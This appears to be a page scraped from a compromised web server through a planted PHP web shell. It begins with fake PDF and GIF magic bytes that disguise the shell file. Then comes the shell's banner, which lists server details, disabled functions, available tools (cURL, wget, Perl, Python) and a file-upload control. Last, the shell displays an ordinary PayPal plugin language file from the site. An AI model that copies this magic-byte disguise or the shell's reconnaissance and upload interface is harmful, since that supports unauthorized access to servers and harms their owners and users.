%PDF-1.7 GIF89;
| Server IP : 104.20.45.2 / Your IP : 172.16.20.3 Web Server : Apache/2.4.25 (Debian) System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : application ( 1000) PHP Version : 5.6.40 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /app/cache/ |
Upload File : |
<?php return array ( 'plugins.paymethod.paypal.displayName' => 'PayPal Fee Payment', 'plugins.paymethod.paypal.settings.paypalenable' => 'Enable PayPal', 'plugins.paymethod.paypal.settings.paypalurl' => 'IPN URL', 'plugins.paymethod.paypal.settings.paypalurl.description' => 'This is the URL to PayPal\'s Instant Payment Notification (IPN) service. For testing, use <u>https://www.sandbox.paypal.com/cgi-bin/webscr</u>; for production systems, use <u>https://www.paypal.com/cgi-bin/webscr</u>.', 'plugins.paymethod.paypal.settings.selleraccount' => 'Seller Account', 'plugins.paymethod.paypal.settings.selleraccount.description' => 'This is the PayPal account username for the sellers\' account to be used, typically an email address. Ensure that you activate Instant Payment Notification (IPN) in your seller account Profile.', 'plugins.paymethod.paypal.settings.curlNotInstalled' => 'Warning: CURL support for PHP is not installed. PayPal payment support requires the CURL library and will not function until it is installed.', 'plugins.paymethod.paypal.settings' => 'PayPal Settings', 'plugins.paymethod.paypal' => 'PayPal Fee Payment', 'plugins.paymethod.paypal.description' => 'PayPal enables users, whether or not they are PayPal members, to use all major credit cards. The Manager will need to set up a <a href="http://www.paypal.com" target="_new">PayPal Business Account</a>.', 'plugins.paymethod.paypal.warning' => 'Click the Continue button below to go to the PayPal site, where credit cards can be used to pay the fee (without having to join PayPal). Use the "Return to Merchant" button after making payment to return to this site.', 'plugins.paymethod.paypal.purchase.title' => 'Title', 'plugins.paymethod.paypal.purchase.fee' => 'Fee', 'plugins.paymethod.paypal.purchase.description' => 'Description', 'plugins.paymethod.paypal.purchase.cancelled' => 'Your purchase has been cancelled.', 'plugins.paymethod.paypal.purchase.cancelled.title' => 'Purchase Cancelled', ); ?>